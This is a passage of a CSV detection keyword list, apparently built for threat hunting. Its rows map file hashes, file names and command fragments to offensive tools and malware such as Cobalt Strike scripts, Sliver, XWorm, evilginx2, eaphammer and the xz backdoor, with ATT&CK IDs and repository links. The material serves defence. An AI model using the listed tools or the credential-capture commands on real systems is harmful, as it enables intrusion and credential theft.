fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*E9D90B2A-F563-4A5E-9EFB-B1D6B1E7F8CB*",".{0,1000}E9D90B2A\-F563\-4A5E\-9EFB\-B1D6B1E7F8CB.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*e9fff62c4585ae6de84da278a20e754ff3ff9ccdd0f11041a43eae84a54a622d*",".{0,1000}e9fff62c4585ae6de84da278a20e754ff3ff9ccdd0f11041a43eae84a54a622d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ea49111ee3bf716e9f4643f95b5df19fd8bd7376464b2795dcfc5e07ddda35eb*",".{0,1000}ea49111ee3bf716e9f4643f95b5df19fd8bd7376464b2795dcfc5e07ddda35eb.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*ea707d12f05cf7fe93ca743158ae20c91ee663c50bd738b776d1183d1c8c7db2*",".{0,1000}ea707d12f05cf7fe93ca743158ae20c91ee663c50bd738b776d1183d1c8c7db2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ea912ca7c74d76924cdf1e634164d723a6d7a48212ab03c0f343a0132754a41b*",".{0,1000}ea912ca7c74d76924cdf1e634164d723a6d7a48212ab03c0f343a0132754a41b.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*ea9258e9975b8925a739066221d996aef19b4ef4f4c91524f82e39d403f25579*",".{0,1000}ea9258e9975b8925a739066221d996aef19b4ef4f4c91524f82e39d403f25579.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" 
"*ea9f997ffb3dd610c9848af65ed980b348c06d8ee11b7fb670d6a789f8075c5a*",".{0,1000}ea9f997ffb3dd610c9848af65ed980b348c06d8ee11b7fb670d6a789f8075c5a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*eaae77ff59bd46d07499b29eaefb4ba3f1d1e36fe3c99ab46bb1fd578113cbe5*",".{0,1000}eaae77ff59bd46d07499b29eaefb4ba3f1d1e36fe3c99ab46bb1fd578113cbe5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*eaphammer -i eth0 --channel 4 --auth wpa-eap --essid * --creds*",".{0,1000}eaphammer\s\-i\seth0\s\-\-channel\s4\s\-\-auth\swpa\-eap\s\-\-essid\s.{0,1000}\s\-\-creds.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*eaphammer*",".{0,1000}eaphammer.{0,1000}","offensive_tool_keyword","EAPHammer","EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such. 
focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate just how fast this tool is. our Quick Start section provides an example of how to execute a credential stealing evil twin attack against a WPA/2-EAP network in just commands","T1553 - T1560 - T1569 - T1590 - T1591","TA0002 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/s0lst1c3/eaphammer","1","0","N/A","N/A","10","1997","298","2024-04-02T22:57:32Z","2017-02-04T01:03:39Z" "*eapmd5tojohn*",".{0,1000}eapmd5tojohn.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*earching for systems where privileged users' credentials might be in running memory*",".{0,1000}earching\sfor\ssystems\swhere\sprivileged\susers\'\scredentials\smight\sbe\sin\srunning\smemory.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*EarlyBird_Injection.py*",".{0,1000}EarlyBird_Injection\.py.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*easinvoker.exe*System32*",".{0,1000}easinvoker\.exe.{0,1000}System32.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*EasyHook-Managed*InjectionLoader.cs*",".{0,1000}EasyHook\-Managed.{0,1000}InjectionLoader\.cs.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*EasyHook-Managed*WOW64Bypass.*",".{0,1000}EasyHook\-Managed.{0,1000}WOW64Bypass\..{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - 
T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*EasyHook-Managed/LocalHook.cs*",".{0,1000}EasyHook\-Managed\/LocalHook\.cs.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*EasyPersistent.cna*",".{0,1000}EasyPersistent\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*eb6536b06148bb2c1a9c4103b98778d51f1204bd0aaf1b01dfb4a2c103ee000a*",".{0,1000}eb6536b06148bb2c1a9c4103b98778d51f1204bd0aaf1b01dfb4a2c103ee000a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*eb6a95c5c92ae3923ae07b80feac9e215f68eaff1289303063fa575a92c27967*",".{0,1000}eb6a95c5c92ae3923ae07b80feac9e215f68eaff1289303063fa575a92c27967.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*eb760ea670e63083e0fef40c12861c6459ebf28b86129c8d3fa200714b2a0b02*",".{0,1000}eb760ea670e63083e0fef40c12861c6459ebf28b86129c8d3fa200714b2a0b02.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "*eb87d686b9a040238e563add68fb05c2776f52332c4798cae372638af3c7fca0*",".{0,1000}eb87d686b9a040238e563add68fb05c2776f52332c4798cae372638af3c7fca0.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*eba7e3def98ff4fe742daf4b2caf56d74fb83b502fc035753646fd5fd115a402*",".{0,1000}eba7e3def98ff4fe742daf4b2caf56d74fb83b502fc035753646fd5fd115a402.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ebaa36db295f1c3a7d59e460ce6813221d0097f3c12ce26e818d4d4ac83c0919*",".{0,1000}ebaa36db295f1c3a7d59e460ce6813221d0097f3c12ce26e818d4d4ac83c0919.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*ebb285411e3ba9431b7c211c1e8ba97753699805f03663cbc367798b4db2c1fc*",".{0,1000}ebb285411e3ba9431b7c211c1e8ba97753699805f03663cbc367798b4db2c1fc.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential 
Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*ebc544aa7679a2d04acf28f4df70bdfe827962993447321ca71e408dd4e10414*",".{0,1000}ebc544aa7679a2d04acf28f4df70bdfe827962993447321ca71e408dd4e10414.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*ebdf64076861a73d92416c6203d50dd25f4c991372f7d47e7146e29ab41a6892*",".{0,1000}ebdf64076861a73d92416c6203d50dd25f4c991372f7d47e7146e29ab41a6892.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" 
"*ebf9bf76500715fe20c475140d200e76b51c400406683827eabb2ab70f9f986f*",".{0,1000}ebf9bf76500715fe20c475140d200e76b51c400406683827eabb2ab70f9f986f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ebfebca063aa056d7ffd8767c7c82d66c0c1a4339eb504a8e0636280dc5b839f*",".{0,1000}ebfebca063aa056d7ffd8767c7c82d66c0c1a4339eb504a8e0636280dc5b839f.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*ebfidpplhabeedpnhjnobghokpiioolj*",".{0,1000}ebfidpplhabeedpnhjnobghokpiioolj.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Ebowla-master.zip*",".{0,1000}Ebowla\-master\.zip.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - 
T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","724","167","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" "*EC235B9DDBCA83FD5BE2B80E2D543B07BE7E1052*",".{0,1000}EC235B9DDBCA83FD5BE2B80E2D543B07BE7E1052.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*ec260817672bcc48f734f89e9eac84ebc7903924b36f807caf58c6820c0e336c*",".{0,1000}ec260817672bcc48f734f89e9eac84ebc7903924b36f807caf58c6820c0e336c.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*ec3fea4e00eb0a4712a869b52eacce7efbcdcc9b958b8f46066e6f8969c4f79c*",".{0,1000}ec3fea4e00eb0a4712a869b52eacce7efbcdcc9b958b8f46066e6f8969c4f79c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ec57e5c4d592d1ad0a0e79b22e85f8173bcb3c03f4497957f90def4175ca383d*",".{0,1000}ec57e5c4d592d1ad0a0e79b22e85f8173bcb3c03f4497957f90def4175ca383d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*EC62CE1D-ADD7-419A-84A9-D6A04E866197*",".{0,1000}EC62CE1D\-ADD7\-419A\-84A9\-D6A04E866197.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*ec6f110ed955c4659147b008e4e1053b15a873b5bb887662b0685f84d929c44c*",".{0,1000}ec6f110ed955c4659147b008e4e1053b15a873b5bb887662b0685f84d929c44c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - 
T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*eca525adef0c1dae7233b25f241c19cddbe8683cbbadd7c69915f7b3c37fb21f*",".{0,1000}eca525adef0c1dae7233b25f241c19cddbe8683cbbadd7c69915f7b3c37fb21f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ecb8ca794b3659f7ecf353e6ae879a6e405bae62ebaeb69cc12d596915d0e0d9*",".{0,1000}ecb8ca794b3659f7ecf353e6ae879a6e405bae62ebaeb69cc12d596915d0e0d9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae*",".{0,1000}ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A" 
"*ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae*",".{0,1000}ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","https://www.virustotal.com/gui/file/ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae","10","10","N/A","N/A","N/A","N/A" "*ecf32e9cc006fb558375569ad4021fe588206e04722fe0474a34d05d9cc358f5*",".{0,1000}ecf32e9cc006fb558375569ad4021fe588206e04722fe0474a34d05d9cc358f5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ecfb9ac1dd1fec043188b3c66c6fbc54c824c9de99e964abfc08836e9877701b*",".{0,1000}ecfb9ac1dd1fec043188b3c66c6fbc54c824c9de99e964abfc08836e9877701b.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & 
